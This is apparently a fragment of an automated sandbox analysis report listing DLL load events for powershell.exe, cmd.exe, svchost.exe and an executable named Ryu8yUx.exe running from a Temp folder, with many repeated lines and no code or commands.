Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
